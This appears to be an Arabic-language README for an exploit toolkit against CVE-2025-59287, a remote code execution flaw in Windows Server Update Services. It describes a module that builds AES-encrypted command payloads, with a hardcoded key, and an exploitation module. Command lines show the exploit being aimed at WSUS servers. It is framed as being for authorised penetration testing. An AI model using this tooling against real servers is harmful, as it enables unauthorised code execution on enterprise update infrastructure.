
مجموعة أدوات استغلال لـ CVE-2025-59287 RCE في WSUS. تتضمن تشفير حمولة AES ووحدة استغلال لاختبار الاختراق المصرح به.
CVE-2025-59287 - مجموعة أدوات استغلال WSUS
بواسطة adel-h4x0a
⚠️ لأغراض تعليمية واختبار مرخص فقط ⚠️
نظرة عامة
توضح هذه المجموعة استغلال CVE-2025-59287، وهي ثغرة تنفيذ تعليمات عن بعد في خدمة تحديثات Windows Server (WSUS).
المكونات
· تشفير الحمولة AES لاتصالات WSUS · دعم لأنماط التشفير القديمة والآمنة · إنشاء حمولات مخصصة
· سلسلة استغلال كاملة لـ CVE-2025-59287 · معالجة قوية للأخطاء ومنطق إعادة المحاولة · دعم الحمولات المخصصة
الهيكل
📁 CVE-2025-59287-WSUS-Exploit/
├── 📄 cve-2025-59287-encr.py # Encryption module
├── 📄 cve-2025-59287-exp.py # Exploitation module
├── 📄 requirements.txt # Dependencies
└── 📄 README.md # This file
الاستخدام
المتطلبات الأساسية
pip install -r requirements.txt
التشفير
# Basic encryption
python cve-2025-59287-encr.py --command "calc" --mode legacy
# Encryption with custom key
python cve-2025-59287-encr.py --key "877C14E433638145AD21BD0C17393071" --command "whoami"
# Save output to file
python cve-2025-59287-encr.py --command "ipconfig" --output payload.txt
الاستغلال
# Basic exploitation
python cve-2025-59287-exp.py http://wsus-server:8530
# With custom payload
python cve-2025-59287-exp.py http://192.168.1.100:8530 --payload custom_payload.txt
# With advanced settings
python cve-2025-59287-exp.py http://wsus-server:8530 --timeout 60 --retries 5
الخيارات
وحدة التشفير (cve-2025-59287-encr.py)
· --key: مفتاح AES بصيغة سداسية عشرية (اختياري)
· --command: الأمر المراد تنفيذه (الافتراضي: calc)
· --mode: نمط التشفير [legacy, secure] (الافتراضي: legacy)
· --output: ملف الإخراج لحفظ الحمولة (اختياري)
وحدة الاستغلال (cve-2025-59287-exp.py)
· target: عنوان URL لخادم WSUS (مطلوب) · --payload: ملف حمولة base64 مخصص (اختياري) · --timeout: مهلة الطلب بالثواني (الافتراضي: 30) · --retries: عدد محاولات إعادة المحاولة (الافتراضي: 3) · --no-banner: إخفاء عرض الشعار (اختياري)
مثال كامل
# Generate custom payload
python cve-2025-59287-encr.py --command "whoami /all" --output custom_payload.txt
# Execute exploitation
python cve-2025-59287-exp.py http://wsus.internal.com:8530 --payload custom_payload.txt
إخلاء المسؤولية القانوني
❗ تحذير مهم:
تم توفير هذه الأداة لأغراض تعليمية واختبار الاختراق المصرح به فقط. الاستخدام غير المصرح به ضد أنظمة لا تمتلكها أو ليس لديك إذن صريح لاختبارها هو أمر غير قانوني.
يجب استخدام هذه الأداة فقط في:
· بيئات الاختبار التي تمتلكها · الأنظمة التي حصلت على إذن كتابي لاختبارها · الأغراض التعليمية والأكاديمية
المطور غير مسؤول عن أي استخدام غير قانوني أو غير مصرح به لهذه الأداة.
الترخيص
هذا المشروع مرخص بموجب رخصة MIT.
التحديثات
· v1.0: إصدار أولي مع دعم كامل للاستغلال · v1.1: تحسين معالجة الأخطاء وتحسينات التسجيل
المساهمة
يُشجع تقديم تقارير الأخطاء وطلبات السحب لتحسين الأداة في إطار الاستخدام المسؤول والأخلاقي.
ملاحظة: احصل دائمًا على إذن كتابي قبل اختبار أي نظام. الوعي الأمني يبدأ بالمسؤولية. 🔒